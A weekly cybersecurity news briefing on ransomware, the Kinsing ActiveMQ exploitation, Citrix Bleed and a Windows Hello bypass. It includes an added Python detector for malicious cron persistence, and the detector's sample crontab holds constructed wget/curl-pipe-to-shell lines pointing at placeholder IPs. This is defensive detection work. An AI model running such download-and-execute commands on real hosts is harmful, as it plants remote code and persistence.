Cyber Security Briefing, 18 - 24 November

November 24, 2023

8Base ransomware group uses Phobos variant

Cisco Talos has detected an increase in activity by cybercriminals using Phobos ransomware and the SmokeLoader Trojan to distribute it. Talos found that the 8Base group uses Phobos in its campaigns, hiding it in encrypted payloads within SmokeLoader that are decrypted and loaded into the process's memory.

8Base has been active since March 2022, and a Phobos sample has been observed using the ".8base" extension for encrypted files, suggesting that 8Base may be a successor to Phobos or is using existing ransomware in its attacks. Cisco Talos also found that Phobos uses SmokeLoader to establish persistence, delete backups and encrypt files.

In addition, the malware protects additional functions with encrypted keys, which allow decryption of locked files. Phobos is a variant of the Dharma ransomware; it is centrally managed and sold as a service to other cybercriminals.

Kinsing exploits vulnerability in Apache ActiveMQ to attack Linux systems

Trend Micro researchers recently discovered that the Kinsing malware, also known as h2miner, is exploiting the critical vulnerability CVE-2023-46604 (CVSS 9.8) in Apache ActiveMQ to compromise Linux systems through remote code execution. Although the flaw was patched in October, many servers remain unpatched and allow arbitrary shell commands to be executed.

Kinsing, known primarily for targeting Linux systems, uses public exploits to download and execute malware, especially cryptocurrency miners. It relies on the ProcessBuilder method to run malicious bash scripts and download additional payloads to the infected device from system-level processes, which gives it flexibility and helps it avoid detection.

Before deploying the miner, Kinsing also removes competing malware and establishes persistence through a cron job that retrieves the latest version of its infection script and adds a rootkit. Since the vulnerability is being actively exploited, the recommendation is to upgrade Apache ActiveMQ to the fixed versions to mitigate the threat.
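The cron-based persistence described above is something a defender can hunt for directly. The following is an added example, not code from Trend Micro, Cisco or the briefing: a small scanner that parses user-crontab lines and flags the download-and-execute pattern (a fetch tool piped into a shell), commands fetched from raw IP addresses, and commands run out of world-writable temporary directories. The crontab content is constructed for illustration, using documentation IP ranges; the indicator names and the single-user crontab format (no user column) are assumptions of this example.

```python
"""
Added example: flag cron entries that look like download-and-execute
persistence. Not from the briefing or any vendor; sample data is constructed.
"""
import re
from dataclasses import dataclass, field

# Schedule is either a nickname (@reboot, @daily, ...) or five whitespace-separated
# fields; the rest of the line is the command. Assumes user-crontab format
# (no user column); /etc/crontab lines carry an extra user field.
CRON_RE = re.compile(r'^(?:@\w+|(?:\S+\s+){5})\s*(.*)$')

# Heuristic indicators (assumed for this example, not an exhaustive ruleset).
DOWNLOADERS = re.compile(r'\b(?:curl|wget)\b')
SHELL_EXEC = re.compile(r'\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b|\b(?:ba)?sh\s+-c\b')
RAW_IP_URL = re.compile(r'https?://\d{1,3}(?:\.\d{1,3}){3}')
TEMP_DIR = re.compile(r'/(?:tmp|var/tmp|dev/shm)/\S*')

# Constructed sample crontab (192.0.2.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_CRONTAB = """\
# constructed sample crontab, not real data
SHELL=/bin/bash
0 2 * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
*/5 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
* * * * * wget -q -O - http://192.0.2.10/update.sh | sh >/dev/null 2>&1
@reboot curl -fsSL http://198.51.100.7/update.sh | bash
30 4 * * * /tmp/.x/run.sh
"""


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list = field(default_factory=list)


def parse_cron_command(line):
    """Return the command part of a crontab line, or None for blank, comment
    and environment-assignment lines."""
    s = line.strip()
    if not s or s.startswith('#') or re.match(r'^\w+\s*=', s):
        return None
    m = CRON_RE.match(s)
    return m.group(1).strip() if m else None


def assess_command(command):
    """Return the list of reasons a command looks like download-and-execute
    persistence; an empty list means nothing matched."""
    reasons = []
    if DOWNLOADERS.search(command) and SHELL_EXEC.search(command):
        reasons.append("downloads remote content and feeds it to a shell")
    if RAW_IP_URL.search(command):
        reasons.append("fetches from a raw IP address instead of a hostname")
    if TEMP_DIR.search(command):
        reasons.append("executes from a world-writable temporary directory")
    return reasons


def scan_crontab(text):
    """Scan crontab text and return a Finding for every suspicious entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = parse_cron_command(line)
        if cmd is None:
            continue
        reasons = assess_command(cmd)
        if reasons:
            findings.append(Finding(n, cmd, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a real host the same scanner can be fed the output of `crontab -l` for each user; the three indicators are deliberately simple, so a hit is a prompt to inspect the entry, not a verdict on its own.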

Citrix requests to close all NetScaler sessions to prevent Citrix Bleed attack

Citrix has issued a note informing system administrators that, to be protected from CVE-2023-4966, known as Citrix Bleed, they must not only apply the patch released in October but also delete all previous user sessions and terminate all active ones. Threat actors have been stealing authentication tokens, which allow them to access compromised devices even after those devices have been patched.

Regarding exploitation, CISA and the FBI have issued a joint advisory warning that the LockBit ransomware group is actively exploiting this vulnerability.

Windows Hello authentication on laptops can be bypassed

Fingerprint authentication on Dell, Lenovo and Microsoft laptops can be bypassed by attacking the fingerprint sensor chip.

Researchers at Blackwing Intelligence, working with Microsoft's Offensive Research and Security Engineering (MORSE) team, explain how, by connecting the laptop to a USB attack device or a purpose-built platform, they were able to carry out a man-in-the-middle attack and bypass Windows Hello authentication. On the Lenovo ThinkPad T14s and Dell Inspiron 15, the legitimate fingerprint ID was spoofed with an attacker's fingerprint, while on the Microsoft Surface Pro X they connected a device that told the system the attacker's user was authorized.

Blackwing recommends that manufacturers enable the Secure Device Connection Protocol (SDCP), as they found that on two of the three laptops this secure channel between the host and the biometric device was disabled.

Image from Freepik.